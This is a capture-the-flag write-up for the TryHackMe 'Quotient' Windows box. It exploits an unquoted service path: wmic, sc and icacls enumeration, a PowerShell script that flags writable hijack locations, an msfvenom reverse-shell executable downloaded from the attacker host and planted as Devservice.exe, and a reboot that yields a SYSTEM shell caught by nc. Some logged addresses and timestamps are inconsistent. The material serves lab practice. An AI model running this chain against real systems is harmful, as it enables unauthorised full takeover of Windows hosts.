THM Quotient: Windows unquoted service path, like this

First, log in with xfreerdp rather than rdesktop: xfreerdp works against this box and rdesktop does not.

The wmic one-liner below lists auto-start services living outside C:\Windows. The last findstr is meant to drop paths that are already quoted (the usual form is findstr /i /v """), which is why the quoted Amazon and Defender entries still appear here; the one we care about is Development Service, whose path is unquoted and contains spaces.

┌──(root💀kali)-[/opt/thm/quotient]
└─# xfreerdp /u:"sage" /v:10.10.160.163
[06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - Certificate verification failure 'self signed certificate (18)' at stack position 
[06:36:18:262] [3317:3318] [WARN][com.freerdp.crypto] - CN = thm-quotient
Password:
[06:36:25:286] [3317:3318] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
# etc
PS C:\Users\Sage> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v "*"
Amazon SSM Agent                            AmazonSSMAgent           "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"                                 Auto
AWS Lite Guest Agent                        AWSLiteAgent             "C:\Program Files\Amazon\XenTools\LiteAgent.exe"                                   Auto
Developmenet Service                        Development Service      C:\Program Files\Development Files\Devservice Files\Service.exe                    Auto
Windows Defender Antivirus Service          WinDefend                "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2205.7-0\MsMpEng.exe"     Auto

C:\Users\Sage>sc qc "Development Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Development Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Development Files\Devservice Files\Service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Developmenet Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\Sage>cd "C:\Program Files\Development Files"

c:\Program Files\Development Files>icacls "C:\Program Files\Development Files"
C:\Program Files\Development Files BUILTIN\Users:(W)
    NT SERVICE\TrustedInstaller:(I)(F)
    NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
    NT AUTHORITY\SYSTEM:(I)(F)
    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
    BUILTIN\Users:(I)(RX)
    BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
    CREATOR OWNER:(I)(OI)(CI)(IO)(F)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
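
A PowerShell script that generalises the wmic, sc and icacls checks above, added here as an example and not part of the original writeup: it lists every service whose binary path is unquoted and contains spaces, expands the candidate paths in the order CreateProcess tries them, and flags the ones whose parent directory the current user can create files in. The function names are mine; it assumes it is run as the low-privileged user (Sage on this box) in an ordinary PowerShell session and hard-codes nothing about the target.

```powershell
# Added example, not part of the original writeup: enumerate unquoted service
# paths, expand the candidates CreateProcess will try, and flag the ones whose
# parent directory the current user can create files in.
# Assumption: run as the low-privileged user (Sage in the writeup) in a normal
# PowerShell session; no box-specific names are hard-coded.

function Get-HijackCandidates {
    param([string]$PathName)
    # A quoted path is passed through unambiguously, so there is nothing to try.
    if ($PathName.StartsWith('"')) { return @() }
    # Keep the text up to and including the executable name; drop any arguments.
    $exe = $PathName
    if ($PathName -match '^(.*?\.exe)') { $exe = $Matches[1] }
    if ($exe -notmatch ' ') { return @() }          # no space, no ambiguity
    $tokens = $exe -split ' '
    $candidates = @()
    # CreateProcess appends .exe to each space-delimited prefix and tries them in
    # order: C:\Program.exe, C:\Program Files\Development.exe, ... before the real binary.
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        $candidates += (($tokens[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-CanCreateFile {
    param([string]$Directory, [switch]$Probe)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    if ($Probe) {
        # Definitive but noisy: create and delete an empty file (leaves file-audit events).
        $probe = Join-Path $Directory ([System.IO.Path]::GetRandomFileName())
        try {
            [System.IO.File]::WriteAllBytes($probe, [byte[]]@())
            Remove-Item -LiteralPath $probe -Force
            return $true
        } catch { return $false }
    }
    # Passive check: does any ACE for our user or one of our groups grant
    # CreateFiles (WriteData)? icacls' (W), (M) and (F) all include that bit.
    $id    = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $names = @($id.Name) + @($id.Groups | ForEach-Object {
        try { $_.Translate([System.Security.Principal.NTAccount]).Value } catch { $null }
    })
    $need  = [System.Security.AccessControl.FileSystemRights]::CreateFiles
    $allow = $false
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($names -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $need) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false }   # explicit deny wins
        $allow = $true
    }
    # Generic-right ACEs (GW) are not mapped here; use -Probe when in doubt.
    return $allow
}

function Find-UnquotedServicePaths {
    param([switch]$Probe)
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        if (-not $svc.PathName) { return }       # entries with no binary path
        foreach ($cand in Get-HijackCandidates $svc.PathName) {
            $dir = Split-Path -Path $cand -Parent
            [PSCustomObject]@{
                Service   = $svc.Name
                StartMode = $svc.StartMode
                RunsAs    = $svc.StartName
                Writable  = Test-CanCreateFile -Directory $dir -Probe:$Probe
                DropHere  = $cand
            }
        }
    }
}

# Only the hits matter: on Quotient this should show Development Service with
# DropHere = C:\Program Files\Development Files\Devservice.exe.
Find-UnquotedServicePaths | Where-Object Writable | Format-Table -AutoSize
```

Without -Probe the check is passive and reads the directory ACL the same way icacls does; Find-UnquotedServicePaths -Probe confirms by creating and deleting an empty file, which is definitive but will show up in object-access auditing if that is switched on. Among the Writable hits, an Auto service running as LocalSystem is the one worth targeting, and DropHere is the exact filename the payload has to be given.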

Build the payload. The filename is the critical part: the service path is unquoted, so when the SCM starts it, CreateProcess tries C:\Program.exe, then C:\Program Files\Development.exe, then C:\Program Files\Development Files\Devservice.exe before the real Service.exe, and the icacls output above shows BUILTIN\Users has write (W) on C:\Program Files\Development Files. Devservice.exe in that directory is the one we can plant:

┌──(root💀kali)-[/opt/thm/quotient]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.9.0.117 LPORT=443 -f exe -o Devservice.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: Devservice.exe
 
┌──(root💀kali)-[/opt/thm/quotient]
└─# updog                                                                                  
[+] Serving /opt/thm/quotient...
 * Running on all addresses.
   WARNING: This is a development server. Do not use it in a production deployment.
 * Running on http://192.168.86.44:9090/ (Press CTRL+C to quit)
10.10.160.163 - - [24/Jul/2022 06:15:14] "GET /Devservice.exe HTTP/1.1" 200 -

Grab the file into the writable directory under the hijack name, then reboot: Sage cannot start or stop the service directly, but it is AUTO_START under LocalSystem, so a reboot starts it for us:

c:\Program Files\Development Files>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Program Files\Development Files> iwr http://10.9.0.117:9090/Devservice.exe -OutFile "C:\Program Files\Development Files\Devservice.exe"
PS C:\Program Files\Development Files>shutdown /r /t 0

When the box comes back up, the SCM starts Development Service as LocalSystem, hits C:\Program Files\Development Files\Devservice.exe first, and the listener catches the shell without anyone logging in (log back in with xfreerdp only if you want the desktop). One caveat: the msfvenom exe is not a real service, so the SCM kills it after roughly 30 seconds for not responding to the start request; if the shell needs to live longer, generate it with -f exe-service or have it spawn a child process.

┌──(root💀kali)-[/opt/thm/quotient]
└─# nc -nvlp 443  
listening on [any] 443 ...
connect to [10.9.0.117] from (UNKNOWN) [10.10.160.163] 49670
Microsoft Windows [Version 10.0.17763.3165]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system